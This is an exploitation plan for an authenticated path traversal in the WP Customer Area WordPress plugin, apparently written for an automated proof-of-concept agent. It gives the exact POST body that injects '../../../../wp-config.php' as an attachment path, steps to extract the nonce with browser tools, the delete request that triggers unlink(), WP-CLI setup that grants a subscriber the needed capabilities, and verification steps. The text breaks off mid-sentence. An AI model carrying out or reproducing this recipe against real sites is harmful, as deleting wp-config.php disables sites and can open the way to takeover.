Exploitation Research Plan - CVE-2026-42661

1. Vulnerability Summary

The WP Customer Area plugin (<= 8.3.4) is vulnerable to an authenticated path traversal vulnerability. The flaw exists in the handling of private file attachments. When a user with sufficient privileges (Custom-level or above) creates or edits a "Private File" (cuar_private_file), they can specify attachment metadata.

Specifically, the plugin fails to sanitize the file path parameter when using certain attachment methods (like ftp-folder or server). When these attachments are later deleted—either individually or when the parent post is deleted—the plugin performs an unlink() operation on the path stored in metadata. By injecting traversal sequences (e.g., ../../../../wp-config.php), an attacker can cause the plugin to delete arbitrary files on the server.

2. Attack Vector Analysis

• Endpoint: Frontend Private Content Editor (handled by CUAR_AbstractEditContentPageAddOn).
• Target Action: create or update of a cuar_private_file, followed by a delete action.
• Vulnerable Parameter: cuar_attachments[index][file]
• Required Authentication: A user account with capabilities to manage private files (e.g., cuar_publish_private_files and cuar_delete_private_files). These are often assigned to the "Custom" role or can be granted to standard roles like Subscriber.
• Precondition: The "Private Files" and "Post Owner" add-ons (built-in) must be active.

3. Code Flow

1. Entry: User submits a form to ?customer-area-page=customer-private-files&cuar_action=create.
2. Processing: CUAR_AbstractEditContentPageAddOn::handle_form_submission() is triggered.
3. Nonce Validation: It verifies cuar_customer-private-files_nonce against the action cuar_customer-private-files.
4. Attachment Handling: do_edit_content() calls filters to process attachments. CUAR_PrivateFilesDefaultHandlers::attach_ftp_file (or attach_server_file) is called via the cuar/private-content/files/on-attach-file?method=ftp-folder hook.
5. Storage: The traversal string ../../../../wp-config.php is saved into the post's metadata (_cuar_attachments).
6. Triggering the Sink: The user submits a request to delete the post: ?customer-area-page=customer-private-files&cuar_action=delete&post_id=ID&nonce=NONCE.
7. Cleanup: CUAR_PrivateFilesDefaultHandlers::remove_orphan_local_files (or remove_attached_local_file) is triggered during post deletion.
8. Sink:
   • It calls $po_addon->get_private_file_path($filename, $post_id, false).
   • $filename is retrieved from meta as ../../../../wp-config.php.
   • The resulting path points to the WordPress root.
   • unlink($filepath) is executed.

4. Nonce Acquisition Strategy

The nonce is required for both creation and deletion of content.

1. Identify Page: The "Create Private File" page must be accessible.
2. Setup: The PoC agent should ensure a page with the creation shortcode exists.
   • Command: wp post create --post_type=page --post_title="Create File" --post_content='[customer_area_create_private_file]' --post_status=publish
3. Navigate: Use browser_navigate to go to the newly created page as the authenticated user.
4. Extract Nonce: The nonce is stored in a hidden input field or localized JS.
   • Field name: cuar_customer-private-files_nonce
   • Extraction: browser_eval("document.getElementsByName('cuar_customer-private-files_nonce')[0].value")

5. Exploitation Strategy

Step 1: Create the Malicious Private File

Send a POST request to create a private file with a traversed attachment path.

• URL: http://localhost:8080/index.php?customer-area-page=customer-private-files&cuar_action=create
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Body:

  cuar_form_id=customer-private-files&
  cuar_customer-private-files_nonce=[EXTRACTED_NONCE]&
  cuar_do_register=1&
  cuar_title=Exploit&
  cuar_content=Exploit&
  cuar_attachments[0][file]=../../../../wp-config.php&
  cuar_attachments[0][method]=ftp-folder&
  cuar_attachments[0][source]=local
  

Step 2: Retrieve the Post ID

Identify the ID of the newly created cuar_private_file. This can be done by parsing the redirect URL or using WP-CLI.

Step 3: Trigger File Deletion

Send a request to delete the created post. The plugin will attempt to "clean up" the attachments.

• URL: http://localhost:8080/index.php?customer-area-page=customer-private-files&cuar_action=delete&post_id=[ID]&nonce=[EXTRACTED_NONCE]
• Method: GET (or POST with cuar_do_register=1 depending on the UI implementation)

6. Test Data Setup

1. Target User: Create a user with the subscriber role.
   • wp user create attacker attacker@example.com --role=subscriber --user_pass=password
2. Grant Capabilities: The plugin uses custom capabilities. Grant them to the subscriber.
   • wp cap add subscriber cuar_publish_private_files
   • wp cap add subscriber cuar_delete_private_files
   • wp cap add subscriber cuar_edit_private_files
3. Create Dashboard: Ensure the Customer Area dashboard is initialized.
   • wp eval "current_user_can('manage_options'); (new CUAR_CustomerPagesAddOn())->create_all_missing_pages();"
4. Target File: Ensure wp-config.php exists (standard in WP).

7. Expected Results

• After Step 1, a new post of type cuar_private_file is created. Its _cuar_attachments meta contains the path ../../../../wp-config.php.
• After Step 3, the unlink() function is called on the construction: [STORAGE_DIR]/[POST_ID]/../../../../wp-config.php.
• Since wp-content/uploads/customer-area/storage/[ID]/../../../../ resolves to the WordPress root, wp-config.php is deleted.

8. Verification Steps

1. Check for Deletion:
   • Command: wp file exists wp-config.php
   • Expected Output: Error or confirmation that the file is missing.
2. Check Database:
   • Command: wp post list --post_type=cuar_private_file
   • The exploit post should no longer exist.

9. Alternative Approaches

If the ftp-folder method is restricted by server configurations:

• Try method=server: If the "Server Side Folders" logic is active, use cuar_attachments[0][method]=server and cuar_attachments[0][source]=server.
• Direct Meta Update (if another vuln exists): If there is a separate vulnerability allowing arbitrary metadata updates, setting _cuar_attachments directly and then using the frontend "Remove Attachment" button (AJAX) would also trigger the unlink.
• Blind Deletion: If the plugin does not provide feedback, use `